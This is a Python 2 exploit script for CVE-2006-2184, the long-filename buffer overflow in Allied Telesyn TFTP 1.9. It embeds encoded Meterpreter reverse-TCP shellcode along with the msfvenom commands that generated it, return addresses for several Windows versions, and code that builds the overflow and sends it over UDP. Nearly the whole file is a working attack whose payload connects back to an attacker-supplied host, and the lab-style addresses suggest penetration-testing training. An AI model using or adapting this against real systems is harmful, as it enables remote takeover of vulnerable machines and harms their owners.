Modified version of the CVE-2006-2184 Python script found here: https://github.com/Re4son/AT-TFTP_Long_Filename/blob/master/attftp_long_filename.py
#!/usr/bin/env python | |
import sys | |
import struct | |
import socket as so | |
# Banner printed at import time (Python 2 print statements); purely informational.
print '#######################################################################'
print '# CVE-2006-2184 - Allied Telesyn TFTP v1.9 Long Filename Overflow #'
print '# This is a modified version of Re4son\'s code #'
print '# (https://github.com/Re4son/AT-TFTP_Long_Filename) #'
print '# The return addresses are ported from metasploit module #'
print '# exploit/windows/tftp/attftp_long_filename #'
print '#######################################################################\n'
# Shellcode - Staged Meterpreter Reverse TCP (NONX) | |
# Badchars: \x00 | |
# StackAdjustment: -3500 | |
# Payload size: 210 bytes | |
# Generation instructions: | |
# printf '\x81\xec\xac\x0d\x00\x00' > payload # sub exp, 0xdac / nop / nop | |
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=10.11.0.95 LPORT=443 \ | |
# -a x86 --platform Windows -e generic/none -f raw >> payload | |
# cat payload | msfvenom -p - -e x86/shikata_ga_nai -b "\x00" -f c | |
SHELLCODE = ( | |
"\xdb\xd6\xd9\x74\x24\xf4\xbe\xcf\xa5\x10\xfb\x5f\x29\xc9\xb1\x2e" | |
"\x83\xc7\x04\x31\x77\x16\x03\x77\x16\xe2\x3a\x24\xfc\x57\xc9\x27" | |
"\xfd\x5b\xbb\xcc\xba\x4b\xc2\xec\xba\x73\x54\x22\x9e\x07\xe9\x78" | |
"\xab\x64\x2c\xf9\xaa\x7b\xc5\xae\x8c\x82\x33\xdb\xf9\x1e\xc2\x32" | |
"\x30\xdf\x5d\x66\xf2\x15\x50\x76\x37\x2d\xaa\x0d\x41\x6d\x4c\xd7" | |
"\x67\x07\x73\x6c\xf3\xa7\x57\x72\xea\x5e\x1c\x68\xb5\x15\x6d\x8d" | |
"\x44\xc3\x72\x81\xdf\x9a\x18\xfd\xc3\xfd\x1f\x1d\xca\x26\xbb\x55" | |
"\x6e\xe9\xc8\x2a\x7d\x82\xbe\xb6\xd0\x1f\x56\xcf\x74\x46\xf5\xa9" | |
"\xe0\xb5\xcb\x5d\x86\xca\x19\xc1\x3c\x4b\xe4\x8f\xdc\x6c\xc0\xe5" | |
"\x4e\xc0\xbf\x56\x32\xb5\x7c\x0a\x3d\xde\xe4\x2d\xd2\x29\xea\x7a" | |
"\x7e\x4c\x53\x63\x5f\x6f\x75\x0a\xd9\x38\x16\x2c\xcf\xae\x80\xd8" | |
"\xfb\xd0\x0f\xbb\x93\xd1\x14\x25\x37\x5b\x89\xc0\xa7\x08\x1a\x73" | |
"\x71\xf9\xa1\x84\x57\x56\x1d\x76\x08\x04\x0a\xd4\xce\x13\x74\xe2" | |
"\xf1\x82" | |
) | |
def set_return(target):
    """Return the packed 32-bit return address for a target id given as a string.

    ``target`` is the id chosen on the command line ('1' to '11').  Each branch
    prints the selection to stdout and packs its address little-endian with
    ``struct.pack('<L', ...)``.  Any other value prints an error and terminates
    the process via ``sys.exit(-1)``, so the function only returns for a known
    id.  The per-address source credits are kept from the original comments.
    """
    if target == '1':
        print '[+] Selecting target: Windows NT SP4 English'
        retaddr = struct.pack('<L', 0x702ea6f7)
    elif target == '2':
        print '[+] Selecting target: Windows 2000 SP0 English'
        retaddr = struct.pack('<L', 0x750362c3)
    elif target == '3':
        print '[+] Selecting target: Windows 2000 SP1 English'
        retaddr = struct.pack('<L', 0x75031d85)
    elif target == '4':
        print '[+] Selecting target: Windows 2000 SP2 English'
        retaddr = struct.pack('<L', 0x7503431b)
    elif target == '5':
        print '[+] Selecting target: Windows 2000 SP3 English'
        retaddr = struct.pack('<L', 0x74fe1c5a)
    elif target == '6':
        print '[+] Selecting target: Windows 2000 SP4 English'
        retaddr = struct.pack('<L', 0x75031dce)
    elif target == '7':
        print '[+] Selecting target: Windows XP SP0/1 English'
        retaddr = struct.pack('<L', 0x71ab7bfb)
    elif target == '8':
        print '[+] Selecting target: Windows XP SP2 English'
        retaddr = struct.pack('<L', 0x71ab9372)
    elif target == '9':
        print '[+] Selecting target: Windows XP SP3 English'
        retaddr = struct.pack('<L', 0x7e429353)  # ret by c0re
    elif target == '10':
        print '[+] Selecting target: Windows Server 2003'
        retaddr = struct.pack('<L', 0x7c86fed3)  # ret donated by securityxxxpert
    elif target == '11':
        print '[+] Selecting target: Windows Server 2003 SP2'
        retaddr = struct.pack('<L', 0x7c86a01b)  # ret donated by Polar Bear
    else:
        # Unknown id: report and exit; nothing is returned on this path.
        print '[-] Target not supported or invalid target specified!'
        sys.exit(-1)
    return retaddr
def build_payload(shellcode, retaddr, lhost):
    """Concatenate the datagram body that send_packet() transmits.

    Layout, in order: two opcode bytes (0x00 0x02), a NOP sled, ``shellcode``,
    ``retaddr`` and a fixed tail.  ``lhost`` is used only to size the sled
    (25 - len(lhost)); the string itself is never appended.  Prints one
    progress line to stdout.
    """
    # Let's build the payload
    print '[+] Constructing payload.'
    # Create NOP sled to bring NOPs & LHOST to 25 bytes
    # NOTE(review): lhost only sizes the sled here and is not itself part of the
    # payload, so the total length varies with len(lhost) -- confirm intended.
    nops = "\x90" * (25 - len(lhost))
    tail = ""  # tail from metasploit
    tail += "\x83\xc4\x28\xc3"  # add esp, 0x28 / ret
    tail += "\x00netascii\x00"  # Finish as expected by the AT TFTP server
    payload = "\x00\x02" + nops + shellcode + retaddr + tail
    return payload
def send_packet(payload, rhost, rport):
    """Send ``payload`` as a single UDP datagram to (rhost, rport).

    Prints progress to stdout.  If sendto() raises OSError the function prints
    an error and exits the process with status -1.  The socket is never closed
    explicitly; it is released when the process ends.
    """
    # Declare a UDP socket
    s = so.socket(so.AF_INET, so.SOCK_DGRAM)
    print "[+] Delivering package..."
    # NOTE(review): the print statements mark this file as Python 2, where
    # socket failures raise socket.error (an IOError subclass, not OSError), so
    # this handler may not fire there -- verify on the interpreter in use.
    try:
        s.sendto(payload, (rhost, rport))
    except OSError:
        print "[-] Could not connect to " + rhost + ":" + str(rport) + "!"
        sys.exit(-1)
    print "[+] Package delivered!"
def main():
    """Parse argv, resolve the return address, build the payload and send it.

    Positional arguments: RHOST, RPORT, LHOST and an optional TARGET id
    (defaults to '10').  Only IndexError (too few arguments) is caught and
    turned into the usage text followed by ``sys.exit(-1)``; a non-numeric
    RPORT raises ValueError from int() and is not handled here.
    """
    try:
        RHOST = sys.argv[1]  # Target IP address as command line argument
        RPORT = int(sys.argv[2])  # Target Port as command line argument
        LHOST = sys.argv[3]  # Attackers IP address
        TARGET = sys.argv[4] if len(sys.argv) > 4 else '10'  # The target system
    except IndexError:
        # Missing required argument: show usage and the target table, then exit.
        print '[-] Usage: %s <RHOST> <RPORT> <LHOST> [<TARGET>]' % sys.argv[0]
        print '[-] Example: %s 10.11.1.226 69 10.11.0.95' % sys.argv[0]
        print '[-]'
        print '[-] Available Targets (* = Default):'
        print '[-] 1 - Windows NT SP4 English'
        print '[-] 2 - Windows 2000 SP0 English'
        print '[-] 3 - Windows 2000 SP1 English'
        print '[-] 4 - Windows 2000 SP2 English'
        print '[-] 5 - Windows 2000 SP3 English'
        print '[-] 6 - Windows 2000 SP4 English'
        print '[-] 7 - Windows XP SP0/1 English'
        print '[-] 8 - Windows XP SP2 English'
        print '[-] 9 - Windows XP SP3 English'
        print '[-] * 10 - Windows Server 2003'
        print '[-] 11 - Windows Server 2003 SP2'
        sys.exit(-1)
    # set_return() exits the process itself on an unknown TARGET id.
    RETADDR = set_return(TARGET)
    PAYLOAD = build_payload(SHELLCODE, RETADDR, LHOST)
    send_packet(PAYLOAD, RHOST, RPORT)
# Script entry point; nothing below runs when the module is imported.
if __name__ == '__main__':
    main()
Refactored and added target selection logic.